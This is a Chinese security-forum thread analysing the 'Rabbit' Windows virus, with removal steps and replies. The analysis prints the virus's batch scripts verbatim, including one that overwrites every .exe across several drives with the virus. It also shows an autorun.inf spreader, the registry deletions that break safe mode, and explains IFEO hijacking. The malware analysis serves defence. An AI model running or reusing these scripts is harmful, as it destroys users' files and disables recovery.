瑞星卡卡安全论坛

病毒是个兔子的图标 还挺好看的蛤

不过这是个行为极其恶劣的病毒
1.破坏安全模式
2.导致系统无法关机 重启 注销
3.直接替换exe文件
4.导致冰刃 sreng SSM等安全工具无法运行

目前所有杀毒软件都还无法查杀

运行文件后：
释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
在进程里有两个 互相监视 不断调用cmd.exe （用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容）和attrib.exe

C:\WINDOWS\system32\loveRabbit.bat内容如下
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
不断为这些文件加上系统和隐藏属性

C:\WINDOWS\system32\love.bat内容如下
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe（正在运行的不替换）


每个分区下面释放一个Rabbit.exe和一个autorun.inf
autorun.inf 内容
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
达到双击运行之目的
右键增加 “自动播放”

注册表方面:
增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe （这项应该导致他的开机启动，本人水平有限，不懂这项注册表，望大家指教）

删除键HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
删除值
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"

达到破坏安全模式的目的

另外此病毒会破坏冰刃 sreng 的运行（即便将他们改名，我测试时候就是改成了fdfdsfds.bat,可照样被结束，不知道原理还..)

测试病毒时候 SSM也没有任何反映 机器直接卡死

而且导致机器无法重启 注销 关机

另外 病毒体内留下文字：
I LOVE Rabbit ,and you ? look:hxxp://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析，感谢)
此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开
不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想
因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有...

附 感染系统后的截图



工作模式：

兔子的几个文件之间存在明显的分工合作关系：

当病毒原文件Rabbit.exe被执行后，会在system32下释放出loveRabbit.exe、jk.exe和love.bat，并执行loveRabbit.exe和love.bat

先看看下面love.bat的内容吧，列出defgh分区和program files的exe文件的列表c:\windows\下的msconfig.inf和msconfig1.inf，并用两个for命令调用copy命令把列表中的exe文件全部用Rabbit.exe替换掉！需要知道这个行为比熊猫和硬盘杀手还有恨，这样丢失的数据基本上是找不回来的！


[Copy to clipboard]CODE:
FOR  %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR  /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR  /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

其中loveRabbit.exe是比较关键的一个进程，这个病毒的大部分工作是由它做的，它负责在system32下生成msexch400.dll并插入winlogon.exe进程；不断生成loveRabbit.bat和DEFG分区根目录下面的autorun.inf文件，并执行不断loveRabbit.bat；
删除注册表项HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}和HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}，不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath；而且它还能关闭icesword和sreng等安全软件；它还能对安全模式的键值作出检查，如被修复了它立刻删除相关键值；

另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat，作用是不断的将病毒文件设置系统和隐藏属性；


[Copy to clipboard]CODE:
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf

而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升，干扰正常的关机和注销，并在loveRabbit.exe被结束时由winlogon.exe重新启动；

至于jk.exe的工作就简单多了，它运行后会检查loverabbit.exe是否被关闭，如关闭了就重新运行它，之后便退出，是用于系统启动时激活病毒的进程；

还有就是在各个分区下面的autorun.inf和rabbit.exe，用于双击进入分区时重新激活病毒；

明显的分工，编写者的思路很清晰，启动用的jk.exe、主要工作进程loverabbit.exe、插入模块msexch400.dll和两个bat文件等，各有各做的事情，合作起来使得运行后病毒很难会被结束掉；



清理办法：

由于它的进程守护太好了，要关闭它实在不容易，而且安全模式被破坏了，就只有另外想办法了……
方法一：这个病毒有个疏忽的地方，就是jk.exe不能靠loverabbit.exe进行修复，而这个是系统启动是激活病毒用的，这就给了我们一个机会了；首先到system32文件夹下面删除jk.exe，不过病毒把系统大部分的exe文件都替换了，所有启动项里面一定要先进行清空然后才重启，由于病毒控制了winlogon.exe进程导致不能正常重启，所以我们就用不经过winlogon.exe的重启方式吧，打开任务管理器，然后按着ctrl再选择任务管理器的关机菜单里面的重启，这样就重启成功了，重启完成后正式清理；

方法二（推荐）：映象劫持，最近学回来的东西，嘻嘻；注册表文件的内容如下，将其导入注册表并结束loverabbit.exe进程之后就可以正式清理了；


[Copy to clipboard]CODE:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loverabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jk.exe]
"Debugger"="dikex.exe"

正式清理：首先到文件夹选项把所有隐藏文件都显示出来，之后删除下面的文件，其中msexch400.dll需要重启或者使用unlocker等工具删除：
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
各个分区根目录下面的rabbit.exe和autorun.inf文件

在我的电脑里面搜索*.exe，把变了兔子图标的文件全部删除（他们无法挽救的了，节哀吧……）

最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的{4bf41072-b2b1-21c1-b5c1-0305f4155515}，导入下面注册表信息：


[Copy to clipboard]CODE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]

------------------已经不算什么新鲜病毒了，但是看了后还是害怕。而且我的NOD32也确实只能删除EXE文件。。。。
转自崔衍渠老师的空间。

引用:

【loveperday的贴子】…… 清理办法： 由于它的进程守护太好了，要关闭它实在不容易，而且安全模式被破坏了，就只有另外想办法了…… 方法一：这个病毒有个疏忽的地方，就是jk.exe不能靠loverabbit.exe进行修复，而这个是系统启动是激活病毒用的，这就给了我们一个机会了；首先到system32文件夹下面删除jk.exe，不过病毒把系统大部分的exe文件都替换了，所有启动项里面一定要先进行清空然后才重启，由于病毒控制了winlogon.exe进程导致不能正常重启，所以我们就用不经过winlogon.exe的重启方式吧，打开任务管理器，然后按着ctrl再选择任务管理器的关机菜单里面的重启，这样就重启成功了，重启完成后正式清理； 方法二（推荐）：映象劫持，最近学回来的东西，嘻嘻 ………………

方法一的疏忽再被病毒作者利用了，就有好戏看了
方法二的映象劫持，病毒与反病毒都来利用，很可怕的说

引用:

【loveperday的贴子】病毒是个兔子的图标 还挺好看的蛤 不过这是个行为极其恶劣的病毒 1.破坏安全模式 2.导致系统无法关机 重启 注销 3.直接替换exe文件 4.导致冰刃 sreng SSM等安全工具无法运行 目前所有杀毒软件都还无法查杀 运行文件后： 释放如下文件 C:\WINDOWS\system32\JK.exe C:\WINDOWS\system32\love.bat C:\WINDOWS\system32\loveRabbit.bat C:\WINDOWS\system32\loveRabbit.exe C:\WINDOWS\system32\msexch400.dll C:\WINDOWS\system32\Rabbit.exe C:\WINDOWS\msconfig.inf C:\WINDOWS\msconfig1.inf 在进程里有两个 互相监视 不断调用cmd.exe （用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容）和attrib.exe C:\WINDOWS\system32\loveRabbit.bat内容如下 attrib +s +h C:\WINDOWS\system32\msexch400.dll attrib +s +h d:\Rabbit.exe attrib +s +h e:\Rabbit.exe attrib +s +h c:\Rabbit.exe attrib +s +h f:\Rabbit.exe attrib +s +h g:\Rabbit.exe attrib +s +h h:\Rabbit.exe attrib +s +h e:\AutoRun.inf attrib +s +h f:\AutoRun.inf attrib +s +h c:\AutoRun.inf attrib +s +h d:\AutoRun.inf attrib +s +h h:\AutoRun.inf attrib +s +h g:\AutoRun.inf 不断为这些文件加上系统和隐藏属性 C:\WINDOWS\system32\love.bat内容如下 FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf cd C:\Program Files dir *.exe /s /b >>c:\windows\msconfig1.inf FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" 把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf 把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf 然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe（正在运行的不替换） 每个分区下面释放一个Rabbit.exe和一个autorun.inf autorun.inf 内容 [autorun] Label=本地磁盘 Shellexecute=Rabbit.exe 达到双击运行之目的 右键增加 “自动播放” 注册表方面: 增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath 指向C:\WINDOWS\system32\JK.exe （这项应该导致他的开机启动，本人水平有限，不懂这项注册表，望大家指教） 删除键HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} 删除值 HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive" HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive" 达到破坏安全模式的目的 另外此病毒会破坏冰刃 sreng 的运行（即便将他们改名，我测试时候就是改成了fdfdsfds.bat,可照样被结束，不知道原理还..) 测试病毒时候 SSM也没有任何反映 机器直接卡死 而且导致机器无法重启 注销 关机 另外 病毒体内留下文字： I LOVE Rabbit ,and you ? look:hxxp://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析，感谢) 此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开 不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想 因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有... 附 感染系统后的截图 工作模式： 兔子的几个文件之间存在明显的分工合作关系： 当病毒原文件Rabbit.exe被执行后，会在system32下释放出loveRabbit.exe、jk.exe和love.bat，并执行loveRabbit.exe和love.bat 先看看下面love.bat的内容吧，列出defgh分区和program files的exe文件的列表c:\windows\下的msconfig.inf和msconfig1.inf，并用两个for命令调用copy命令把列表中的exe文件全部用Rabbit.exe替换掉！需要知道这个行为比熊猫和硬盘杀手还有恨，这样丢失的数据基本上是找不回来的！ [Copy to clipboard]CODE: FOR  %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf cd C:\Program Files dir *.exe /s /b >>c:\windows\msconfig1.inf FOR  /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" FOR  /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" 其中loveRabbit.exe是比较关键的一个进程，这个病毒的大部分工作是由它做的，它负责在system32下生成msexch400.dll并插入winlogon.exe进程；不断生成loveRabbit.bat和DEFG分区根目录下面的autorun.inf文件，并执行不断loveRabbit.bat； 删除注册表项HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}和HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}，不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath；而且它还能关闭icesword和sreng等安全软件；它还能对安全模式的键值作出检查，如被修复了它立刻删除相关键值； 另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat，作用是不断的将病毒文件设置系统和隐藏属性； [Copy to clipboard]CODE: attrib +s +h C:\WINDOWS\system32\msexch400.dll attrib +s +h d:\Rabbit.exe attrib +s +h e:\Rabbit.exe attrib +s +h c:\Rabbit.exe attrib +s +h f:\Rabbit.exe attrib +s +h g:\Rabbit.exe attrib +s +h h:\Rabbit.exe attrib +s +h e:\AutoRun.inf attrib +s +h f:\AutoRun.inf attrib +s +h c:\AutoRun.inf attrib +s +h d:\AutoRun.inf attrib +s +h h:\AutoRun.inf attrib +s +h g:\AutoRun.inf 而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升，干扰正常的关机和注销，并在loveRabbit.exe被结束时由winlogon.exe重新启动； 至于jk.exe的工作就简单多了，它运行后会检查loverabbit.exe是否被关闭，如关闭了就重新运行它，之后便退出，是用于系统启动时激活病毒的进程； 还有就是在各个分区下面的autorun.inf和rabbit.exe，用于双击进入分区时重新激活病毒； 明显的分工，编写者的思路很清晰，启动用的jk.exe、主要工作进程loverabbit.exe、插入模块msexch400.dll和两个bat文件等，各有各做的事情，合作起来使得运行后病毒很难会被结束掉； 清理办法： 由于它的进程守护太好了，要关闭它实在不容易，而且安全模式被破坏了，就只有另外想办法了…… 方法一：这个病毒有个疏忽的地方，就是jk.exe不能靠loverabbit.exe进行修复，而这个是系统启动是激活病毒用的，这就给了我们一个机会了；首先到system32文件夹下面删除jk.exe，不过病毒把系统大部分的exe文件都替换了，所有启动项里面一定要先进行清空然后才重启，由于病毒控制了winlogon.exe进程导致不能正常重启，所以我们就用不经过winlogon.exe的重启方式吧，打开任务管理器，然后按着ctrl再选择任务管理器的关机菜单里面的重启，这样就重启成功了，重启完成后正式清理； 方法二（推荐）：映象劫持，最近学回来的东西，嘻嘻；注册表文件的内容如下，将其导入注册表并结束loverabbit.exe进程之后就可以正式清理了； [Copy to clipboard]CODE: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loverabbit.exe] "Debugger"="dikex.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rabbit.exe] "Debugger"="dikex.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jk.exe] "Debugger"="dikex.exe" 正式清理：首先到文件夹选项把所有隐藏文件都显示出来，之后删除下面的文件，其中msexch400.dll需要重启或者使用unlocker等工具删除： C:\WINDOWS\system32\JK.exe C:\WINDOWS\system32\love.bat C:\WINDOWS\system32\loveRabbit.bat C:\WINDOWS\system32\loveRabbit.exe C:\WINDOWS\system32\msexch400.dll C:\WINDOWS\system32\Rabbit.exe C:\WINDOWS\msconfig.inf C:\WINDOWS\msconfig1.inf 各个分区根目录下面的rabbit.exe和autorun.inf文件 在我的电脑里面搜索*.exe，把变了兔子图标的文件全部删除（他们无法挽救的了，节哀吧……） 最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的{4bf41072-b2b1-21c1-b5c1-0305f4155515}，导入下面注册表信息： [Copy to clipboard]CODE: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}] @="DiskDrive" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}] @="DiskDrive" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}] @="DiskDrive" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}] ------------------已经不算什么新鲜病毒了，但是看了后还是害怕。而且我的NOD32也确实只能删除EXE文件。。。。 转自崔衍渠老师的空间。 ………………

他转自我的空间哈
http://forum.ikaka.com/topic.asp?board=28&artid=8295622
http://hi.baidu.com/newcenturysun/blog/item/3377d8bf1117c10b19d81fa3.html

【回复“loveperday”的帖子】
“兔宝宝”变种。
中此毒后，可以特殊方式运行IceSword：
在CMD环境中，切换到IceSword所在目录，然后以IceSword.exe/c命令打开IceSword即可。

引用:

【baohe的贴子】【回复“loveperday”的帖子】 “兔宝宝”变种。 中此毒后，可以特殊方式运行IceSword： 在CMD环境中，切换到IceSword所在目录，然后以IceSword.exe/c命令打开IceSword即可。 ………………

那个 /c是什么意思亚？
强制运行？

呵呵！！

这才又绝了点。

猫猫常透露一些东西。

以后可就越来越难了哦。

呵呵！！！

学习了！汗！

回复大家：
    映象劫持被用在反病毒上我第一次听说，以毒攻毒！应该很有效。以后对于已知病毒主程序的病毒就好办多了。
    猫叔说的那个，也是刚刚在冰刃的帮助里看到。这种方法打开后，必须ctrl+alt+d 才能关掉。但是据说这个兔子是通过模拟键盘按键技术实现屏蔽程序的，不知道这样为什么就可以了，有待测试。
    newcenturymoon，不好意思啊，看来你比崔厉害，哈哈

引用:

【loveperday的贴子】回复大家：     映象劫持被用在反病毒上我第一次听说，以毒攻毒！应该很有效。以后对于已知病毒主程序的病毒就好办多了。     猫叔说的那个，也是刚刚在冰刃的帮助里看到。这种方法打开后，必须ctrl+alt+d 才能关掉。但是据说这个兔子是通过模拟键盘按键技术实现屏蔽程序的，不知道这样为什么就可以了，有待测试。     newcenturymoon，不好意思啊，看来你比崔厉害，哈哈 ………………

用IFEO劫持，以牙还牙，有时可以，有时不行（如：具有注册表监控功能的病毒）

呼呼....学习.......

【回复“独孤豪侠”的帖子】

你不是最喜欢看贴不回的呢...呵呵...

本人只回猫叔的贴..

心情好的话偶尔回一个...

【回复“独孤豪侠”的帖子】
那我谢谢您，哈哈~
注册表啊注册表，WIN系统的命门！

引用:

【loveperday的贴子】回复大家：     映象劫持被用在反病毒上我第一次听说 ………………

也不是第一次听说
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Vagaa.exe]
"Debugger"="c:\\垃圾.exe"

对待喜欢搞小动作的人，用用也无妨，因为组策略不运行指定的程序对于setup后直接运行的程序无效。嘿嘿

恕我愚顿，这个映象劫持是和组策略相关的？

中了这些病毒.如果使用系统还原,那能不能修复那些被替换了的东西呢

对于这个毒，猫叔测试过，可以。只是我机器不好，所以把系统还原关了。

呵呵,估计那个做病毒的在为微软做广告,一定要用微软自带的还原系统

猫叔能不能介绍下映像劫持的原理和定义，简单一点就行，我只是想了解一下

引用:

【琼台听雨的贴子】猫叔能不能介绍下映像劫持的原理和定义，简单一点就行，我只是想了解一下 ………………

IFEO劫持，简单的说，是这样的：
病毒在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options分支下建立一系列子键，键名为被劫持的程序（如：瑞星的监控程序RavMon.exe），类型为“字符串”，键值项名为Debugger，Debugger的值为病毒程序主体（如：C:\windows\system32\avfj.exe）。
这样，每当系统启动时，瑞星监控程序加载时均被那个Debugger的键值劫持到病毒程序avfj.exe。实际加载的不是瑞星监控，而是病毒。

懂了，Debugger是不是指用指定的程序调试被劫持程序？

引用:

【琼台听雨的贴子】懂了，Debugger是不是指用指定的程序调试被劫持程序？ ………………

是的
被Debugger指定的“调试程序”若是病毒程序，那还调试啥？以运行病毒代替运行被劫持程序而已。就这么点儿伎俩，却搞得很多人头晕并大骂杀软、防火墙....
典型的“离间计”啊！！

好玩的东西.可惜姑苏技术不精,无法测试